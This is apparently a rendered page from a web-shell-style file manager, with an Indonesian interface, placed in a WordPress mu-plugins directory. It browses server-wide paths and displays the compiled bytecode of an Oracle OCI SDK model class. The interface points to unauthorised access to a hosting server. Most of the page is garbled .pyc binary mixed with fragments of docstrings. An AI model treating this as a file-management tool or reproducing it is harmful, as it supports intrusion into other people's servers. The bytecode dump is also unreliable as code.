📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
lib
›
python3.9
›
site-packages
›
oci
›
ai_document
›
models
›
📁 __pycache__
📍
Lokasi:
/usr/lib/python3.9/site-packages/oci/ai_document/models/__pycache__
💾
Free:
45.4 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: create_processor_job_details.cpython-39.pyc
a ���fk � @ s8 d dl mZmZmZ d dlmZ eG dd� de��ZdS )� )�formatted_flat_dict� NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc @ s� e Zd ZdZdd� Zedd� �Zejdd� �Zedd� �Zejd d� �Zed d� �Z e jdd� �Z ed d� �Z e jdd� �Z edd� �Zejdd� �Zdd� Zdd� Z dd� ZdS )�CreateProcessorJobDetailsz5 The details used to create a processor job. c K sF dddddd�| _ dddd d d�| _d| _d| _d| _d| _d| _dS )ar Initializes a new CreateProcessorJobDetails object with values from keyword arguments. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param input_location: The value to assign to the input_location property of this CreateProcessorJobDetails. :type input_location: oci.ai_document.models.InputLocation :param output_location: The value to assign to the output_location property of this CreateProcessorJobDetails. :type output_location: oci.ai_document.models.OutputLocation :param compartment_id: The value to assign to the compartment_id property of this CreateProcessorJobDetails. :type compartment_id: str :param display_name: The value to assign to the display_name property of this CreateProcessorJobDetails. :type display_name: str :param processor_config: The value to assign to the processor_config property of this CreateProcessorJobDetails. :type processor_config: oci.ai_document.models.ProcessorConfig Z InputLocationZOutputLocation�strZProcessorConfig)�input_location�output_location�compartment_id�display_name�processor_configZ inputLocationZoutputLocationZ compartmentIdZdisplayNameZprocessorConfigN)Z swagger_typesZ attribute_map�_input_location�_output_location�_compartment_id� _display_name�_processor_config)�self�kwargs� r �W/usr/lib/python3.9/site-packages/oci/ai_document/models/create_processor_job_details.py�__init__ s"